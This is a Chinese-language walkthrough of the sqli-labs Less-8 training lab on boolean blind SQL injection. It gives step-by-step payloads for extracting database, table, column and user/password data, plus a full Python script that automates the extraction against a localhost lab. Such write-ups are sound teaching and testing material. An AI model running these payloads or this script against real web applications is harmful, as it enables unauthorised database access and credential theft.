Sqli-labs Less8

1. 判断注入点

kail mysql爆破_kail mysql爆破


kail mysql爆破_kail mysql爆破_02

根据回显不同,存在单引号闭合注入点,可以尝试布尔盲注。

2.判断字段

kail mysql爆破_kail mysql爆破_03

kail mysql爆破_web安全_04

根据order by判断,字段数为3。

3.爆破数据库

1' and length(database())=8 --+	判断数据库名字的长度
1' and ascii(substr(database(),1,1))=101 --+	判断数据库名中每个字符(第一个字符)
1' and ascii(substr(database(),2,1))=101 --+	判断数据库名中每个字符(第二个字符)

kail mysql爆破_web安全_05

爆破数据库名字的长度为8。

kail mysql爆破_web安全_06

爆破数据库名中的第一个字符为s,对应ASCII码115。

kail mysql爆破_ci_07

爆破数据库名中的第二个字符为e,对应ASCII码101。

重复步骤得出,数据库名为security。

数据量大,推荐使用工具进行爆破,比如Burpsuite。

kail mysql爆破_kail mysql爆破_08

4.爆破表

判断表的数量:
1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+
	或者将前面的结果带入查询语句:
1' and (select count(table_name) from information_schema.tables where table_schema='security')=4 --+

判断表名长度:
1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6 --+	判断第一个表的长度
1' and length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5 --+	判断第四个表的长度

判断表名的字符:
1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) >79 --+	判断第一个表名的第一个字符
1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)) =117--+	判断第四个表名的第一个字符
判断表的数量

kail mysql爆破_mysql_09

判断表的数量为4。

判断表名长度

kail mysql爆破_kail mysql爆破_10

判断第一个表的表名长度为6。

kail mysql爆破_ci_11

第四个表名长度为5。

判断表名的字符

kail mysql爆破_ci_12

爆破第四个表的第一个字母为u,对应ASCII码117。

重复步骤得出,第四个表名为users。

5.爆破列

判断字段列数:
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=3 --+	

判断字段名的字符:
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),1,1))=105 --+	判断第一列的列名第一个字符
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=ascii('d') --+	判断第一列的列名第二个字符

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1))=ascii('u') --+	判断第二列的列名第一个字符
判断列数

kail mysql爆破_ci_13

判断字段列数为3。

判断列名的字符

kail mysql爆破_mysql_14

判断第一列的列名的第一个字符为i,对应ASCII码为105。

kail mysql爆破_kail mysql爆破_15

判断第一列的列名的第二个字符为d,对应ASCII码为100。

kail mysql爆破_kail mysql爆破_16

判断第二列的列名的第一个字符为u,对应ASCII码为117。

重复步骤得出,三个列分别是id,username,password。

6.爆破数据

判断表中的条数:
1' and (select count(*) from users)=13 --+	判断用户表中字段的条数
判断数据的长度:
1' and length((select username from users limit 0,1))=4 --+	判断username字段第一个数据的长度
判断数据字符:
1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+
判断表中的条数

kail mysql爆破_ci_17

判断用户表字段的条数为13条。

判断数据的长度

kail mysql爆破_sql_18

判断username字段第一个数据的长度为4。

判断数据的字符

kail mysql爆破_ci_19

判断username字段第一个数据的第一个字符为D,对应ASCII码68。

重复步骤得出,得到username为Dumb。
同理得到password为Dumb。

自动化脚本

根据 页面正常的话一定会有‘you are in’在响应中,网上也有直接整理出来的脚本:

import requests

# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = f"http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' and length(database())>{i}"
        r = requests.get(url + '%23')
        if 'You are in' not in r.text:
            print('database_length:', i)
            return i


#获取数据库名
def database_name(databaselen):
     name = ''
     for j in range(1, databaselen+1):
        for i in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz":
            url = "http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' and substr(database(),%d,1)='%s'" % (j, i)
            #print(url+'%23')
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
     print('database_name:', name)


# 获取数据库表
def tables_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(table_name) from information_schema.tables " \
                  "where table_schema=database()),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('table_name:', name)



# 获取表中字段
def columns_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(column_name) from information_schema.columns where " \
                  "table_schema=database() and table_name='users'),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('column_name:', name)



# 获取username
def username_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(username) from users),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('username_value:', name)



# 获取password
def password_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(password) from users),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('password_value:', name)


if __name__ == '__main__':
    dblen = database_len()
    database_name(dblen)
    tables_name()
    columns_name()
    username_value()
    password_value()

kail mysql爆破_web安全_20